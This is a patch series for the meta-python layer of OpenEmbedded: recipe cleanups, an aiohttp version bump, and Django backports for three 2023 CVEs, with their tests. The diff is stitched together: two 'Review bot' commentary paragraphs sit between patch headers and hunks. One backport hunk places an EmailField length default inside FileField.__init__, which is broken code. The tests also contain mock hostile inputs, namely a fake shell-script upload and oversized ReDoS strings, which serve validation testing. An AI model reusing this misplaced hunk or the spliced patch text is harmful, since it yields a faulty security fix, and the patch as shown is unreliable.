"${WORKDIR}/Unix-Statgrab-${PV}" export LD = "${CCLD}" inherit cpan pkgconfig ptest-perl - -BBCLASSEXTEND = "native" diff --git a/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb b/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb index c86ec092a6..871eb7cae9 100644 --- a/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb +++ b/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb @@ -11,5 +11,3 @@ RDEPENDS:${PN} += " \ ${PYTHON_PN}-jinja2 \ ${PYTHON_PN}-aiohttp \ " - -BBCLASSEXTEND = "native nativesdk" 
diff --git a/meta-python/recipes-devtools/python/python3-aiohttp_3.8.1.bb b/meta-python/recipes-devtools/python/python3-aiohttp_3.8.6.bb index f2b8d52a72..f8ca9a4739 100644 --- a/meta-python/recipes-devtools/python/python3-aiohttp_3.8.1.bb +++ b/meta-python/recipes-devtools/python/python3-aiohttp_3.8.6.bb @@ -2,9 +2,9 @@ SUMMARY = "Async http client/server framework" DESCRIPTION = "Asynchronous HTTP client/server framework for asyncio and Python" HOMEPAGE = "https://github.com/aio-libs/aiohttp" LICENSE = "Apache-2.0" -LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8074d6c6e217873b2a018a4522243ea3" +LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=748073912af33aa59430d3702aa32d41" -SRC_URI[sha256sum] = "fc5471e1a54de15ef71c1bc6ebe80d4dc681ea600e68bfd1cbce40427f0b7578" +SRC_URI[sha256sum] = "b0cf2a4501bff9330a8a5248b4ce951851e415bdcce9dc158e76cfd55e15085c" PYPI_PACKAGE = "aiohttp" inherit python_setuptools_build_meta pypi diff --git a/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb b/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb index 78514a412f..afb798bd71 100644 --- a/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb +++ b/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb @@ -19,5 +19,3 @@ RDEPENDS:${PN} += " \ ${PYTHON_PN}-txaio \ ${PYTHON_PN}-six \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-can_4.0.0.bb b/meta-python/recipes-devtools/python/python3-can_4.0.0.bb index 2cd2e624b9..79aa3e19ec 100644 --- a/meta-python/recipes-devtools/python/python3-can_4.0.0.bb +++ b/meta-python/recipes-devtools/python/python3-can_4.0.0.bb 
@@ -11,16 +11,19 @@ inherit pypi setuptools3 RDEPENDS:${PN}:class-target += "\ ${PYTHON_PN}-aenum \ - ${PYTHON_PN}-ctypes \ ${PYTHON_PN}-codecs \ ${PYTHON_PN}-compression \ + ${PYTHON_PN}-ctypes \ ${PYTHON_PN}-fcntl \ ${PYTHON_PN}-logging \ ${PYTHON_PN}-misc \ ${PYTHON_PN}-netserver \ + ${PYTHON_PN}-packaging \ + ${PYTHON_PN}-pkg-resources \ + ${PYTHON_PN}-setuptools \ ${PYTHON_PN}-sqlite3 \ + ${PYTHON_PN}-typing-extensions \ ${PYTHON_PN}-wrapt \ - ${PYTHON_PN}-pkg-resources \ " BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-31047.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-31047.patch new file mode 100644 index 0000000000..ab29a2ed97 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-31047.patch 
@@ -0,0 +1,352 @@ +From fd3215dec5d50aa1f09cb1f8eba193524e7379f3 Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Thu, 25 May 2023 14:49:15 +0000 +Subject: [PATCH] Fixed CVE-2023-31047, Fixed #31710 + +-- Prevented potential bypass of validation when uploading multiple files using one form field. + +Thanks Moataz Al-Sharida and nawaik for reports. + +Co-authored-by: Shai Berger <shai@platonix.com> +Co-authored-by: nessita <124304+nessita@users.noreply.github.com> + +CVE: CVE-2023-31047 + +Upstream-Status: Backport [https://github.com/django/django/commit/fb4c55d9ec4bb812a7fb91fa20510d91645e411b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/forms/widgets.py | 26 ++++++- + docs/releases/2.2.28.txt | 18 +++++ + docs/topics/http/file-uploads.txt | 65 ++++++++++++++++-- + .../forms_tests/field_tests/test_filefield.py | 68 ++++++++++++++++++- + .../widget_tests/test_clearablefileinput.py | 5 ++ + .../widget_tests/test_fileinput.py | 44 ++++++++++++ + 6 files changed, 218 insertions(+), 8 deletions(-) + +diff --git a/django/forms/widgets.py b/django/forms/widgets.py +index e37036c..d0cc131 100644 +--- a/django/forms/widgets.py ++++ b/django/forms/widgets.py +@@ -372,17 +372,41 @@ class MultipleHiddenInput(HiddenInput): + + + class FileInput(Input): ++ allow_multiple_selected = False + input_type = 'file' + needs_multipart_form = True + template_name = 'django/forms/widgets/file.html' + ++ def __init__(self, attrs=None): ++ if ( ++ attrs is not None ++ and not self.allow_multiple_selected ++ and attrs.get("multiple", False) ++ ): ++ raise ValueError( ++ "%s doesn't support uploading multiple files." 
++ % self.__class__.__qualname__ ++ ) ++ if self.allow_multiple_selected: ++ if attrs is None: ++ attrs = {"multiple": True} ++ else: ++ attrs.setdefault("multiple", True) ++ super().__init__(attrs) ++ + def format_value(self, value): + """File input never renders a value.""" + return + + def value_from_datadict(self, data, files, name): + "File widgets take data from FILES, not POST" +- return files.get(name) ++ getter = files.get ++ if self.allow_multiple_selected: ++ try: ++ getter = files.getlist ++ except AttributeError: ++ pass ++ return getter(name) + + def value_omitted_from_data(self, data, files, name): + return name not in files +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 43270fc..854c6b0 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -20,3 +20,21 @@ CVE-2022-28347: Potential SQL injection via ``QuerySet.explain(**options)`` on P + :meth:`.QuerySet.explain` method was subject to SQL injection in option names, + using a suitably crafted dictionary, with dictionary expansion, as the + ``**options`` argument. ++ ++Backporting the CVE-2023-31047 fix on Django 2.2.28. ++ ++CVE-2023-31047: Potential bypass of validation when uploading multiple files using one form field ++================================================================================================= ++ ++Uploading multiple files using one form field has never been supported by ++:class:`.forms.FileField` or :class:`.forms.ImageField` as only the last ++uploaded file was validated. Unfortunately, :ref:`uploading_multiple_files` ++topic suggested otherwise. ++ ++In order to avoid the vulnerability, :class:`~django.forms.ClearableFileInput` ++and :class:`~django.forms.FileInput` form widgets now raise ``ValueError`` when ++the ``multiple`` HTML attribute is set on them. To prevent the exception and ++keep the old behavior, set ``allow_multiple_selected`` to ``True``. 
++ ++For more details on using the new attribute and handling of multiple files ++through a single field, see :ref:`uploading_multiple_files`. +diff --git a/docs/topics/http/file-uploads.txt b/docs/topics/http/file-uploads.txt +index 21a6f06..c1ffb80 100644 +--- a/docs/topics/http/file-uploads.txt ++++ b/docs/topics/http/file-uploads.txt +@@ -127,19 +127,54 @@ field in the model:: + form = UploadFileForm() + return render(request, 'upload.html', {'form': form}) + ++.. _uploading_multiple_files: ++ + Uploading multiple files + ------------------------ + +-If you want to upload multiple files using one form field, set the ``multiple`` +-HTML attribute of field's widget: ++.. ++ Tests in tests.forms_tests.field_tests.test_filefield.MultipleFileFieldTest ++ should be updated after any changes in the following snippets. ++ ++If you want to upload multiple files using one form field, create a subclass ++of the field's widget and set the ``allow_multiple_selected`` attribute on it ++to ``True``. ++ ++In order for such files to be all validated by your form (and have the value of ++the field include them all), you will also have to subclass ``FileField``. See ++below for an example. ++ ++.. admonition:: Multiple file field ++ ++ Django is likely to have a proper multiple file field support at some point ++ in the future. + + .. 
code-block:: python + :caption: forms.py + + from django import forms + ++ ++ class MultipleFileInput(forms.ClearableFileInput): ++ allow_multiple_selected = True ++ ++ ++ class MultipleFileField(forms.FileField): ++ def __init__(self, *args, **kwargs): ++ kwargs.setdefault("widget", MultipleFileInput()) ++ super().__init__(*args, **kwargs) ++ ++ def clean(self, data, initial=None): ++ single_file_clean = super().clean ++ if isinstance(data, (list, tuple)): ++ result = [single_file_clean(d, initial) for d in data] ++ else: ++ result = single_file_clean(data, initial) ++ return result ++ ++ + class FileFieldForm(forms.Form): +- file_field = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True})) ++ file_field = MultipleFileField() + + Then override the ``post`` method of your + :class:`~django.views.generic.edit.FormView` subclass to handle multiple file +@@ -159,14 +194,32 @@ uploads: + def post(self, request, *args, **kwargs): + form_class = self.get_form_class() + form = self.get_form(form_class) +- files = request.FILES.getlist('file_field') + if form.is_valid(): +- for f in files: +- ... # Do something with each file. + return self.form_valid(form) + else: + return self.form_invalid(form) + ++ def form_valid(self, form): ++ files = form.cleaned_data["file_field"] ++ for f in files: ++ ... # Do something with each file. ++ return super().form_valid() ++ ++.. warning:: ++ ++ This will allow you to handle multiple files at the form level only. Be ++ aware that you cannot use it to put multiple files on a single model ++ instance (in a single field), for example, even if the custom widget is used ++ with a form field related to a model ``FileField``. ++ ++.. backportedfix:: 2.2.28 ++ ++ In previous versions, there was no support for the ``allow_multiple_selected`` ++ class attribute, and users were advised to create the widget with the HTML ++ attribute ``multiple`` set through the ``attrs`` argument. 
However, this ++ caused validation of the form field to be applied only to the last file ++ submitted, which could have adverse security implications. ++ + Upload Handlers + =============== + +diff --git a/tests/forms_tests/field_tests/test_filefield.py b/tests/forms_tests/field_tests/test_filefield.py +index 3357444..ba559ee 100644 +--- a/tests/forms_tests/field_tests/test_filefield.py ++++ b/tests/forms_tests/field_tests/test_filefield.py +@@ -1,7 +1,8 @@ + import pickle + + from django.core.files.uploadedfile import SimpleUploadedFile +-from django.forms import FileField, ValidationError ++from django.core.validators import validate_image_file_extension ++from django.forms import FileField, FileInput, ValidationError + from django.test import SimpleTestCase + + +@@ -82,3 +83,68 @@ class FileFieldTest(SimpleTestCase): + + def test_file_picklable(self): + self.assertIsInstance(pickle.loads(pickle.dumps(FileField())), FileField) ++ ++ ++class MultipleFileInput(FileInput): ++ allow_multiple_selected = True ++ ++ ++class MultipleFileField(FileField): ++ def __init__(self, *args, **kwargs): ++ kwargs.setdefault("widget", MultipleFileInput()) ++ super().__init__(*args, **kwargs) ++ ++ def clean(self, data, initial=None): ++ single_file_clean = super().clean ++ if isinstance(data, (list, tuple)): ++ result = [single_file_clean(d, initial) for d in data] ++ else: ++ result = single_file_clean(data, initial) ++ return result ++ ++ ++class MultipleFileFieldTest(SimpleTestCase): ++ def test_file_multiple(self): ++ f = MultipleFileField() ++ files = [ ++ SimpleUploadedFile("name1", b"Content 1"), ++ SimpleUploadedFile("name2", b"Content 2"), ++ ] ++ self.assertEqual(f.clean(files), files) ++ ++ def test_file_multiple_empty(self): ++ f = MultipleFileField() ++ files = [ ++ SimpleUploadedFile("empty", b""), ++ SimpleUploadedFile("nonempty", b"Some Content"), ++ ] ++ msg = "'The submitted file is empty.'" ++ with self.assertRaisesMessage(ValidationError, msg): ++ f.clean(files) 
++ with self.assertRaisesMessage(ValidationError, msg): ++ f.clean(files[::-1]) ++ ++ def test_file_multiple_validation(self): ++ f = MultipleFileField(validators=[validate_image_file_extension]) ++ ++ good_files = [ ++ SimpleUploadedFile("image1.jpg", b"fake JPEG"), ++ SimpleUploadedFile("image2.png", b"faux image"), ++ SimpleUploadedFile("image3.bmp", b"fraudulent bitmap"), ++ ] ++ self.assertEqual(f.clean(good_files), good_files) ++ ++ evil_files = [ ++ SimpleUploadedFile("image1.sh", b"#!/bin/bash -c 'echo pwned!'\n"), ++ SimpleUploadedFile("image2.png", b"faux image"), ++ SimpleUploadedFile("image3.jpg", b"fake JPEG"), ++ ] ++ ++ evil_rotations = ( ++ evil_files[i:] + evil_files[:i] # Rotate by i. ++ for i in range(len(evil_files)) ++ ) ++ msg = "File extension “sh” is not allowed. Allowed extensions are: " ++ for rotated_evil_files in evil_rotations: ++ with self.assertRaisesMessage(ValidationError, msg): ++ f.clean(rotated_evil_files) +diff --git a/tests/forms_tests/widget_tests/test_clearablefileinput.py b/tests/forms_tests/widget_tests/test_clearablefileinput.py +index 2ba376d..8d9e38a 100644 +--- a/tests/forms_tests/widget_tests/test_clearablefileinput.py ++++ b/tests/forms_tests/widget_tests/test_clearablefileinput.py +@@ -161,3 +161,8 @@ class ClearableFileInputTest(WidgetTest): + self.assertIs(widget.value_omitted_from_data({}, {}, 'field'), True) + self.assertIs(widget.value_omitted_from_data({}, {'field': 'x'}, 'field'), False) + self.assertIs(widget.value_omitted_from_data({'field-clear': 'y'}, {}, 'field'), False) ++ ++ def test_multiple_error(self): ++ msg = "ClearableFileInput doesn't support uploading multiple files." 
++ with self.assertRaisesMessage(ValueError, msg): ++ ClearableFileInput(attrs={"multiple": True}) +diff --git a/tests/forms_tests/widget_tests/test_fileinput.py b/tests/forms_tests/widget_tests/test_fileinput.py +index bbd7c7f..24daf5d 100644 +--- a/tests/forms_tests/widget_tests/test_fileinput.py ++++ b/tests/forms_tests/widget_tests/test_fileinput.py +@@ -1,4 +1,6 @@ ++from django.core.files.uploadedfile import SimpleUploadedFile + from django.forms import FileInput ++from django.utils.datastructures import MultiValueDict + + from .base import WidgetTest + +@@ -18,3 +20,45 @@ class FileInputTest(WidgetTest): + def test_value_omitted_from_data(self): + self.assertIs(self.widget.value_omitted_from_data({}, {}, 'field'), True) + self.assertIs(self.widget.value_omitted_from_data({}, {'field': 'value'}, 'field'), False) ++ ++ def test_multiple_error(self): ++ msg = "FileInput doesn't support uploading multiple files." ++ with self.assertRaisesMessage(ValueError, msg): ++ FileInput(attrs={"multiple": True}) ++ ++ def test_value_from_datadict_multiple(self): ++ class MultipleFileInput(FileInput): ++ allow_multiple_selected = True ++ ++ file_1 = SimpleUploadedFile("something1.txt", b"content 1") ++ file_2 = SimpleUploadedFile("something2.txt", b"content 2") ++ # Uploading multiple files is allowed. ++ widget = MultipleFileInput(attrs={"multiple": True}) ++ value = widget.value_from_datadict( ++ data={"name": "Test name"}, ++ files=MultiValueDict({"myfile": [file_1, file_2]}), ++ name="myfile", ++ ) ++ self.assertEqual(value, [file_1, file_2]) ++ # Uploading multiple files is not allowed. 
++ widget = FileInput() ++ value = widget.value_from_datadict( ++ data={"name": "Test name"}, ++ files=MultiValueDict({"myfile": [file_1, file_2]}), ++ name="myfile", ++ ) ++ self.assertEqual(value, file_2) ++ ++ def test_multiple_default(self): ++ class MultipleFileInput(FileInput): ++ allow_multiple_selected = True ++ ++ tests = [ ++ (None, True), ++ ({"class": "myclass"}, True), ++ ({"multiple": False}, False), ++ ] ++ for attrs, expected in tests: ++ with self.subTest(attrs=attrs): ++ widget = MultipleFileInput(attrs=attrs) ++ self.assertIs(widget.attrs["multiple"], expected) +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-36053.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-36053.patch new file mode 100644 index 0000000000..2ad38d8e95 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-36053.patch 
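Review bot: The new `FileInput.__init__` rejects `multiple` only when it arrives through the `attrs` argument, so a widget whose attribute is set after construction (for example `widget.attrs["multiple"] = True` in a form's `__init__`) is not caught, and `value_from_datadict` still returns only what `files.get(name)` gives, which is the last file, as `test_value_from_datadict_multiple` shows. Projects picking up this backport should audit for that pattern and for views that read `request.FILES.getlist(...)` directly, because files obtained that way never pass through field validation. Separately, the documentation snippet added to `docs/topics/http/file-uploads.txt` ends with `return super().form_valid()`, which omits the argument that `form_valid(self, form)` takes; it should read `return super().form_valid(form)`.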
@@ -0,0 +1,263 @@ +From a0b2eeeb7350d0c3a9b9be191783ff15daeffec5 Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Thu, 27 Jul 2023 14:51:48 +0000 +Subject: [PATCH] Fixed CVE-2023-36053 + +-- Prevented potential ReDoS in EmailValidator and URLValidator. + +Thanks Seokchan Yoon for reports. + +CVE: CVE-2023-36053 + +Upstream-Status: Backport [https://github.com/django/django/commit/454f2fb93437f98917283336201b4048293f7582] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/core/validators.py | 9 +++++++-- + django/forms/fields.py | 3 +++ + docs/ref/forms/fields.txt | 4 ++++ + docs/ref/validators.txt | 19 ++++++++++++++++++- + docs/releases/2.2.28.txt | 9 +++++++++ + .../field_tests/test_emailfield.py | 5 ++++- + tests/forms_tests/tests/test_forms.py | 19 +++++++++++++------ + tests/validators/tests.py | 11 +++++++++++ + 8 files changed, 69 insertions(+), 10 deletions(-) + +diff --git a/django/core/validators.py b/django/core/validators.py +index 2da0688..2dbd3bf 100644 +--- a/django/core/validators.py ++++ b/django/core/validators.py +@@ -102,6 +102,7 @@ class URLValidator(RegexValidator): + message = _('Enter a valid URL.') + schemes = ['http', 'https', 'ftp', 'ftps'] + unsafe_chars = frozenset('\t\r\n') ++ max_length = 2048 + + def __init__(self, schemes=None, **kwargs): + super().__init__(**kwargs) +@@ -109,7 +110,9 @@ class URLValidator(RegexValidator): + self.schemes = schemes + + def __call__(self, value): +- if isinstance(value, str) and self.unsafe_chars.intersection(value): ++ if not isinstance(value, str) or len(value) > self.max_length: ++ raise ValidationError(self.message, code=self.code) ++ if self.unsafe_chars.intersection(value): + raise ValidationError(self.message, code=self.code) + # Check if the scheme is valid. 
+ scheme = value.split('://')[0].lower() +@@ -190,7 +193,9 @@ class EmailValidator: + self.domain_whitelist = whitelist + + def __call__(self, value): +- if not value or '@' not in value: ++ # The maximum length of an email is 320 characters per RFC 3696 ++ # section 3. ++ if not value or '@' not in value or len(value) > 320: + raise ValidationError(self.message, code=self.code) + + user_part, domain_part = value.rsplit('@', 1) +diff --git a/django/forms/fields.py b/django/forms/fields.py +index a977256..f939338 100644 +--- a/django/forms/fields.py ++++ b/django/forms/fields.py +@@ -542,6 +542,9 @@ class FileField(Field): + def __init__(self, *, max_length=None, allow_empty_file=False, **kwargs): + self.max_length = max_length + self.allow_empty_file = allow_empty_file ++ # The default maximum length of an email is 320 characters per RFC 3696 ++ # section 3. ++ kwargs.setdefault("max_length", 320) + super().__init__(**kwargs) + + def to_python(self, data): +diff --git a/docs/ref/forms/fields.txt b/docs/ref/forms/fields.txt +index 6f76d0d..3a888ef 100644 +--- a/docs/ref/forms/fields.txt ++++ b/docs/ref/forms/fields.txt +@@ -592,6 +592,10 @@ For each field, we describe the default widget used if you don't specify + Has two optional arguments for validation, ``max_length`` and ``min_length``. + If provided, these arguments ensure that the string is at most or at least the + given length. ++ ``empty_value`` which work just as they do for :class:`CharField`. The ++ ``max_length`` argument defaults to 320 (see :rfc:`3696#section-3`). ++ ++ The default value for ``max_length`` was changed to 320 characters. + + ``FileField`` + ------------- +diff --git a/docs/ref/validators.txt b/docs/ref/validators.txt +index 75d1394..4178a1f 100644 +--- a/docs/ref/validators.txt ++++ b/docs/ref/validators.txt +@@ -125,6 +125,11 @@ to, or in lieu of custom ``field.clean()`` methods. + :param code: If not ``None``, overrides :attr:`code`. 
+ :param whitelist: If not ``None``, overrides :attr:`whitelist`. + ++ An :class:`EmailValidator` ensures that a value looks like an email, and ++ raises a :exc:`~django.core.exceptions.ValidationError` with ++ :attr:`message` and :attr:`code` if it doesn't. Values longer than 320 ++ characters are always considered invalid. ++ + .. attribute:: message + + The error message used by +@@ -145,13 +150,17 @@ to, or in lieu of custom ``field.clean()`` methods. + ``['localhost']``. Other domains that don't contain a dot won't pass + validation, so you'd need to whitelist them as necessary. + ++ In older versions, values longer than 320 characters could be ++ considered valid. ++ + ``URLValidator`` + ---------------- + + .. class:: URLValidator(schemes=None, regex=None, message=None, code=None) + + A :class:`RegexValidator` that ensures a value looks like a URL, and raises +- an error code of ``'invalid'`` if it doesn't. ++ an error code of ``'invalid'`` if it doesn't. Values longer than ++ :attr:`max_length` characters are always considered invalid. + + Loopback addresses and reserved IP spaces are considered valid. Literal + IPv6 addresses (:rfc:`3986#section-3.2.2`) and unicode domains are both +@@ -168,6 +177,14 @@ to, or in lieu of custom ``field.clean()`` methods. + + .. _valid URI schemes: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml + ++ .. attribute:: max_length ++ ++ The maximum length of values that could be considered valid. Defaults ++ to 2048 characters. ++ ++ In older versions, values longer than 2048 characters could be ++ considered valid. ++ + ``validate_email`` + ------------------ + +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 854c6b0..ab4884b 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -38,3 +38,12 @@ keep the old behavior, set ``allow_multiple_selected`` to ``True``. 
+ + For more details on using the new attribute and handling of multiple files + through a single field, see :ref:`uploading_multiple_files`. ++ ++Backporting the CVE-2023-36053 fix on Django 2.2.28. ++ ++CVE-2023-36053: Potential regular expression denial of service vulnerability in ``EmailValidator``/``URLValidator`` ++=================================================================================================================== ++ ++``EmailValidator`` and ``URLValidator`` were subject to potential regular ++expression denial of service attack via a very large number of domain name ++labels of emails and URLs. +diff --git a/tests/forms_tests/field_tests/test_emailfield.py b/tests/forms_tests/field_tests/test_emailfield.py +index 826524a..fe5b644 100644 +--- a/tests/forms_tests/field_tests/test_emailfield.py ++++ b/tests/forms_tests/field_tests/test_emailfield.py +@@ -8,7 +8,10 @@ class EmailFieldTest(FormFieldAssertionsMixin, SimpleTestCase): + + def test_emailfield_1(self): + f = EmailField() +- self.assertWidgetRendersTo(f, '<input type="email" name="f" id="id_f" required>') ++ self.assertEqual(f.max_length, 320) ++ self.assertWidgetRendersTo( ++ f, '<input type="email" name="f" id="id_f" maxlength="320" required>' ++ ) + with self.assertRaisesMessage(ValidationError, "'This field is required.'"): + f.clean('') + with self.assertRaisesMessage(ValidationError, "'This field is required.'"): +diff --git a/tests/forms_tests/tests/test_forms.py b/tests/forms_tests/tests/test_forms.py +index d4e421d..8893f89 100644 +--- a/tests/forms_tests/tests/test_forms.py ++++ b/tests/forms_tests/tests/test_forms.py +@@ -422,11 +422,18 @@ class FormsTestCase(SimpleTestCase): + get_spam = BooleanField() + + f = SignupForm(auto_id=False) +- self.assertHTMLEqual(str(f['email']), '<input type="email" name="email" required>') ++ self.assertHTMLEqual( ++ str(f["email"]), ++ '<input type="email" name="email" maxlength="320" required>', ++ ) + self.assertHTMLEqual(str(f['get_spam']), 
'<input type="checkbox" name="get_spam" required>') + + f = SignupForm({'email': 'test@example.com', 'get_spam': True}, auto_id=False) +- self.assertHTMLEqual(str(f['email']), '<input type="email" name="email" value="test@example.com" required>') ++ self.assertHTMLEqual( ++ str(f["email"]), ++ '<input type="email" name="email" maxlength="320" value="test@example.com" ' ++ "required>", ++ ) + self.assertHTMLEqual( + str(f['get_spam']), + '<input checked type="checkbox" name="get_spam" required>', +@@ -2780,7 +2787,7 @@ Good luck picking a username that doesn't already exist.</p> + <option value="true">Yes</option> + <option value="false">No</option> + </select></li> +-<li><label for="id_email">Email:</label> <input type="email" name="email" id="id_email"></li> ++<li><label for="id_email">Email:</label> <input type="email" name="email" id="id_email" maxlength="320"></li> + <li class="required error"><ul class="errorlist"><li>This field is required.</li></ul> + <label class="required" for="id_age">Age:</label> <input type="number" name="age" id="id_age" required></li>""" + ) +@@ -2796,7 +2803,7 @@ Good luck picking a username that doesn't already exist.</p> + <option value="true">Yes</option> + <option value="false">No</option> + </select></p> +-<p><label for="id_email">Email:</label> <input type="email" name="email" id="id_email"></p> ++<p><label for="id_email">Email:</label> <input type="email" name="email" id="id_email" maxlength="320"></p> + <ul class="errorlist"><li>This field is required.</li></ul> + <p class="required error"><label class="required" for="id_age">Age:</label> + <input type="number" name="age" id="id_age" required></p>""" +@@ -2815,7 +2822,7 @@ Good luck picking a username that doesn't already exist.</p> + <option value="false">No</option> + </select></td></tr> + <tr><th><label for="id_email">Email:</label></th><td> +-<input type="email" name="email" id="id_email"></td></tr> ++<input type="email" name="email" id="id_email" 
maxlength="320"></td></tr> + <tr class="required error"><th><label class="required" for="id_age">Age:</label></th> + <td><ul class="errorlist"><li>This field is required.</li></ul> + <input type="number" name="age" id="id_age" required></td></tr>""" +@@ -3428,7 +3435,7 @@ Good luck picking a username that doesn't already exist.</p> + f = CommentForm(data, auto_id=False, error_class=DivErrorList) + self.assertHTMLEqual(f.as_p(), """<p>Name: <input type="text" name="name" maxlength="50"></p> + <div class="errorlist"><div class="error">Enter a valid email address.</div></div> +-<p>Email: <input type="email" name="email" value="invalid" required></p> ++<p>Email: <input type="email" name="email" value="invalid" maxlength="320" required></p> + <div class="errorlist"><div class="error">This field is required.</div></div> + <p>Comment: <input type="text" name="comment" required></p>""") + +diff --git a/tests/validators/tests.py b/tests/validators/tests.py +index 1f09fb5..8204f00 100644 +--- a/tests/validators/tests.py ++++ b/tests/validators/tests.py +@@ -58,6 +58,7 @@ TEST_DATA = [ + + (validate_email, 'example@atm.%s' % ('a' * 64), ValidationError), + (validate_email, 'example@%s.atm.%s' % ('b' * 64, 'a' * 63), ValidationError), ++ (validate_email, "example@%scom" % (("a" * 63 + ".") * 100), ValidationError), + (validate_email, None, ValidationError), + (validate_email, '', ValidationError), + (validate_email, 'abc', ValidationError), +@@ -242,6 +243,16 @@ TEST_DATA = [ + (URLValidator(EXTENDED_SCHEMES), 'git+ssh://git@github.com/example/hg-git.git', None), + + (URLValidator(EXTENDED_SCHEMES), 'git://-invalid.com', ValidationError), ++ ( ++ URLValidator(), ++ "http://example." + ("a" * 63 + ".") * 1000 + "com", ++ ValidationError, ++ ), ++ ( ++ URLValidator(), ++ "http://userid:password" + "d" * 2000 + "@example.aaaaaaaaaaaaa.com", ++ None, ++ ), + # Newlines and tabs are not accepted. 
+ (URLValidator(), 'http://www.djangoproject.com/\n', ValidationError), + (URLValidator(), 'http://[::ffff:192.9.5.5]\n', ValidationError), +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-41164.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-41164.patch new file mode 100644 index 0000000000..9bc38b0cca --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-41164.patch 
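Review bot: The `django/forms/fields.py` hunk of this backport lands in `FileField.__init__` (hunk header `class FileField(Field)`, context line `self.allow_empty_file = allow_empty_file`), while the added comment and the new `test_emailfield_1` assertion `self.assertEqual(f.max_length, 320)` are about `EmailField`. As placed, `kwargs.setdefault("max_length", 320)` adds `max_length` to the kwargs that `FileField` forwards to `super().__init__(**kwargs)`, which presumably changes or breaks `FileField` construction and leaves `EmailField` without the 320-character form default. The validator-level limits in `django/core/validators.py` (`len(value) > 320`, `len(value) > self.max_length`) are unaffected, so the ReDoS bound itself still holds. The two added lines belong in `EmailField.__init__` ahead of its `super().__init__` call; that method is outside the hunk, so the context has to be checked against the 2.2.28 source.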
@@ -0,0 +1,105 @@ +From 9c95e8fec62153f8dfcc45a70b8a68d74333a66f Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Tue, 26 Sep 2023 10:23:30 +0000 +Subject: [PATCH] Fixed CVE-2023-41164 -- Fixed potential DoS in + django.utils.encoding.uri_to_iri(). + +Thanks MProgrammer (https://hackerone.com/mprogrammer) for the report. + +Co-authored-by: nessita <124304+nessita@users.noreply.github.com> + +CVE: CVE-2023-41164 + +Upstream-Status: Backport [https://github.com/django/django/commit/3f41d6d62929dfe53eda8109b3b836f26645bdce] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/utils/encoding.py | 6 ++++-- + docs/releases/2.2.28.txt | 9 +++++++++ + tests/utils_tests/test_encoding.py | 21 ++++++++++++++++++++- + 3 files changed, 33 insertions(+), 3 deletions(-) + +diff --git a/django/utils/encoding.py b/django/utils/encoding.py +index 98da647..3769702 100644 +--- a/django/utils/encoding.py ++++ b/django/utils/encoding.py +@@ -225,6 +225,7 @@ def repercent_broken_unicode(path): + repercent-encode any octet produced that is not part of a strictly legal + UTF-8 octet sequence. 
+ """ ++ changed_parts = [] + while True: + try: + path.decode() +@@ -232,9 +233,10 @@ def repercent_broken_unicode(path): + # CVE-2019-14235: A recursion shouldn't be used since the exception + # handling uses massive amounts of memory + repercent = quote(path[e.start:e.end], safe=b"/#%[]=:;$&()+,!?*@'~") +- path = path[:e.start] + force_bytes(repercent) + path[e.end:] ++ changed_parts.append(path[: e.start] + repercent.encode()) ++ path = path[e.end :] + else: +- return path ++ return b"".join(changed_parts) + path + + + def filepath_to_uri(path): +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index ab4884b..40eb230 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -47,3 +47,12 @@ CVE-2023-36053: Potential regular expression denial of service vulnerability in + ``EmailValidator`` and ``URLValidator`` were subject to potential regular + expression denial of service attack via a very large number of domain name + labels of emails and URLs. ++ ++Backporting the CVE-2023-41164 fix on Django 2.2.28. ++ ++CVE-2023-41164: Potential denial of service vulnerability in ``django.utils.encoding.uri_to_iri()`` ++=================================================================================================== ++ ++``django.utils.encoding.uri_to_iri()`` was subject to potential denial of ++service attack via certain inputs with a very large number of Unicode ++characters. 
